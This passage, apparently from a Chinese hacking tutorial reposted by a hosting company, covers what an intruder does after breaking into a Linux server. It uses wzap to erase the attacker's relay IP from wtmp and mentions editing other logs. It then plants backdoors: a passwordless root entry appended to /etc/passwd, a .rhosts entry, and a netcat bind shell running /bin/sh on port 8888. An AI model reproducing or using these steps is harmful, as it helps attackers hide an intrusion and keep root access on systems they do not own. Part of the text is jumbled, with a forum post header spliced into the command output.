#The authpriv file has restricted access.
Authpriv.*
#Log all the amil messages in one place.
Mail.* /var/log/maillog
#Everybody gets emergency messages,plus log them on another
#machine.
*.emerg
#Save mail and news errors of level err and higher in a
#special file.
Uucp,news.crit
/var/log/spooler
有了这些信息后我们就知道在/var/log目录下查找关键登陆文档了!简单的列一个目录,我们发现存在的各种登记文档,包括cron,maillog,messages,spooler,secure,wtmp和xferlog。
系统改变的文档有很多,包括了:messages,secure,wtmp和xferlog。既然wtmp是二进制的我们就能够用wzap.c来清理wtmp记录文档(这个文档在很多黑客网站上能找到源代码)
#gcc –o wzap wzap.c
#who ./wtmp
joel ftpd17264 jul 1 12:09 (*.*.*.*) 注:(*.*.*.*是跳板主机的IP地址,也是我们
root tty1 jul 4 22:21 要清除的IP地址)
root tty1 jul 5 18:25
…………..
joel ftpd945 jul 14 17:25(*.*.*.*)
…………..
root
作者: ★果冻★[457283] 2001-07-17 16:34:38 [回复]
root tty1 jul 20 18:14
#/opt/wzap
Enter username to zap from the wtmp:joe1
Opening file…
Opening output file…
Working…
#who ./wtmp.out
root tty1 jul 4 22:21
root tty1 jul 5 18:25
…….
好了。。这样我们的wtmp记录就删除了!!!
我们接下来能够用VI当然也能够用相应的黑客程式来抹掉其他的登陆记录。我就不再在这里多说了,方法大同小异的!!!
四.后门篇
1..添加一个root用户
echo “jelly::0:0::/:/bin/sh”>> /etc/passwd
这个帐户没有密码:)但是这很容易被管理员发现,只要他看一下文档就会发现多出来的用户名!
2..echo “ ” >>/.rhosts
用户能够通过rlogin rsh rcp等连接到服务器。但是这种方法也容易暴露自己
3..修改Sendmail.cf但是这个后门一般的扫描器都会刺探到比如:nessus我想自己的劳动成果是不愿意让别人随意拿走的吧?
4..Shell后门
这种后门最普遍,也很简单。通常是在某一特定端口监听,假如连接上后立即执行/bin/sh。这样就能够得到shell的使用权了。这类似的源程式能够在一些好点的黑客网站上找到。比如说安全焦点(www.xfocus.org)
5.修改内核或降低某些软件版本达到后门目的。但是这种方法实现不容易。假如弄不好就会被发现,所以建议不要轻易使用这种方法
后门举例:
#gcc –o nc nc.c
#nc –l –d /bin/sh –p 8888
以后我们只要直接telnet服务器的8888端口就能够得到shell了:)
好了关于一次完整的入侵过程就讲到这里,但是在这里还是要提醒大家,入侵国内网站是十分危险的,请大家三思而行啊!!!
文章整理:西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!
